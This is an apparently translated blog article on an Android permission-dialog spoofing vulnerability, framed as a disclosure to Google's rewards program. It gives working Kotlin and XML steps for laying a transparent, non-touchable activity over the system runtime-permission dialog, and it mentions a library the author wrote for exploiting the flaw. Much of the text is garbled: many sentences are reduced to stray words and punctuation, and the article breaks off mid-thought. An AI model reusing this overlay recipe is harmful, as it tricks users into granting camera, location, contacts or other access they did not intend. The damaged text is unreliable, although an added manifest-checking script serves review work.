Changing Runtime Permissions in Android

Hello, my name is Vitaly.





I am 25 years old and graduated from the St. Petersburg State Electrotechnical University "LETI" in my hometown. I have been programming for 10 years, 4 of them for Android. I am the author of many homebrew programs for the Sony PlayStation Portable (PSP), where I am known as VITTACH.





Today I would like to discuss the problem of mobile application security. Developers at Google are constantly improving Android, finding and fixing vulnerabilities with the help of a large community gathered through the Android Security Rewards program, which we will talk about later. Nevertheless, problems remain, and it is our common task as a community to report them so that they are corrected in a timely manner.





The vulnerability I am describing is classified as Priority P2 and Severity S2, which, according to the table, broadly means:

  • A problem that needs to be resolved within a reasonable time frame;
  • An issue that is important to a large percentage of users and is related to core functionality.





Runtime permission

This article focuses on runtime permissions, which every Android developer knows, and specifically on the possibility of misleading the end user by showing a permission dialog with custom text and a custom icon on top of the system one. Such an approach would let a developer appear to ask the user for, say, file system access while the user is in fact granting access to geolocation, the camera, or something else.





It's impossible

A similar question has been asked more than once on specialized forums, in particular on StackOverflow. The only correct answer was that it is impossible. And this is true: it is impossible to replace the text in the system dialog itself, but it is possible to cover it with your own.





What's under the hood

Runtime Permission Android 6.0



dangerous-. , . dangerous .





Dangerous permissions
  • android.permission_group.CALENDAR
    • android.permission.READ_CALENDAR
    • android.permission.WRITE_CALENDAR
  • android.permission_group.CAMERA
    • android.permission.CAMERA
  • android.permission_group.CONTACTS
    • android.permission.READ_CONTACTS
    • android.permission.WRITE_CONTACTS
    • android.permission.GET_ACCOUNTS
  • android.permission_group.LOCATION
    • android.permission.ACCESS_FINE_LOCATION
    • android.permission.ACCESS_COARSE_LOCATION
  • android.permission_group.MICROPHONE
    • android.permission.RECORD_AUDIO
  • android.permission_group.PHONE
    • android.permission.READ_PHONE_STATE
    • android.permission.CALL_PHONE
    • android.permission.READ_CALL_LOG
    • android.permission.WRITE_CALL_LOG
    • android.permission.ADD_VOICEMAIL
    • android.permission.USE_SIP
    • android.permission.PROCESS_OUTGOING_CALLS
  • android.permission_group.SENSORS
    • android.permission.BODY_SENSORS
  • android.permission_group.SMS
    • android.permission.SEND_SMS
    • android.permission.RECEIVE_SMS
    • android.permission.READ_SMS
    • android.permission.RECEIVE_WAP_PUSH
    • android.permission.RECEIVE_MMS
    • android.permission.READ_CELL_BROADCASTS
  • android.permission_group.STORAGE
    • android.permission.READ_EXTERNAL_STORAGE
    • android.permission.WRITE_EXTERNAL_STORAGE









Android GrantPermissionsActivity, .





ActivityCompat.requestPermissions(
    this@MainActivity,
    arrayOf(Manifest.permission.READ_CONTACTS),
    PERMISSION_REQUEST_CODE
)



Activity, UI , Activity, .





:





Activity android:windowIsTranslucent=true



( Activity , , ) Activity , . Activity Activity .





– Activity , – Activity . Activity, ?





, , , , . , :





Activity , onResume



onPause



. Activity.





, Activity , . – !





,

Kotlin









  • ,





    <style name="Theme.Transparent" parent="AppTheme">
        <item name="android:windowBackground">@android:color/transparent</item>
        <item name="android:windowIsTranslucent">true</item>
    </style>
          
          



  • Activity





    ...
    <activity android:name=".PermissionActivity"
              android:theme="@style/Theme.Transparent" />
          
          



  • PermissionActivity layout





    onCreate :





    window.addFlags(
      FLAG_NOT_FOCUSABLE or FLAG_NOT_TOUCH_MODAL or FLAG_NOT_TOUCHABLE
    )
          
          



    :





    • FLAG_NOT_FOCUSABLE



      : window, FLAG_NOT_FOCUSABLE



      , ;





    • FLAG_NOT_TOUCH_MODAL



      : , , , ;





    • FLAG_NOT_TOUCHABLE



      : .





  • MainActivity





    ActivityCompat.requestPermissions(
        this@MainActivity,
        arrayOf(Manifest.permission.READ_CONTACTS),
        REQUEST_CODE
    )
          
          



  • MainActivity : PermissionActivity.





    startActivity(Intent(this, PermissionActivity::class.java))
          
          



    PermissionActivity Activity . !
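
A review-side check for the pattern assembled in the steps above, as an added example that is not from the original article or the author's library: it flags activities that use a translucent theme in an app that also requests dangerous permissions. The sample manifest and styles are constructed from the article's snippets, and the heuristic itself is an assumption; a hit is a prompt for manual review, since window flags set in code are not visible in these files.

```python
import xml.etree.ElementTree as ET

ANDROID = "{http://schemas.android.com/apk/res/android}"
# Subset of the dangerous permissions listed in this article.
DANGEROUS = {"android.permission." + p for p in (
    "READ_CONTACTS", "CAMERA", "RECORD_AUDIO", "ACCESS_FINE_LOCATION",
    "READ_SMS", "READ_EXTERNAL_STORAGE")}

# Constructed sample inputs modelled on the article's snippets.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android">
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <application android:theme="@style/AppTheme">
    <activity android:name=".MainActivity"/>
    <activity android:name=".PermissionActivity"
              android:theme="@style/Theme.Transparent"/>
  </application>
</manifest>"""
STYLES = """<resources>
  <style name="AppTheme" parent="Theme.AppCompat.Light"/>
  <style name="Theme.Transparent" parent="AppTheme">
    <item name="android:windowIsTranslucent">true</item>
  </style>
</resources>"""

def translucent_styles(styles_xml):
    """Names of styles that resolve to windowIsTranslucent=true."""
    styles = {}
    for s in ET.fromstring(styles_xml).iter("style"):
        name, parent = s.get("name"), s.get("parent")
        if parent is None and "." in name:      # implicit dotted-name parent
            parent = name.rsplit(".", 1)[0]
        items = {i.get("name"): (i.text or "").strip() for i in s.iter("item")}
        styles[name] = ((parent or "").replace("@style/", ""), items)
    def resolve(name, seen=()):
        if name not in styles or name in seen:  # unknown parent or cycle
            return False
        parent, items = styles[name]
        value = items.get("android:windowIsTranslucent")
        return value == "true" if value is not None else resolve(parent, seen + (name,))
    return {n for n in styles if resolve(n)}

def review(manifest_xml, styles_xml):
    """Flag activities with a translucent theme in an app requesting dangerous permissions."""
    root = ET.fromstring(manifest_xml)
    requested = sorted({p.get(ANDROID + "name") for p in root.iter("uses-permission")} & DANGEROUS)
    translucent = translucent_styles(styles_xml)
    app = root.find("application")
    findings = []
    for act in app.iter("activity"):
        theme = (act.get(ANDROID + "theme") or app.get(ANDROID + "theme", "")).replace("@style/", "")
        if requested and theme in translucent:
            findings.append((act.get(ANDROID + "name"), theme, requested))
    return findings
```
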





Android >= 7.1.1

Runtime Permission Android 6.0



, 7.1.1



, .. Android



.





Android 6.0



, . , Google .





Android Rewards Program

I submitted an application and attached all explanatory and demonstration documents related to this vulnerability. At the moment, the application is under consideration, so I cannot divulge the details, because I have signed the corresponding agreement.





How is it easier?

For the convenience of exploiting the vulnerability, I wrote a library



















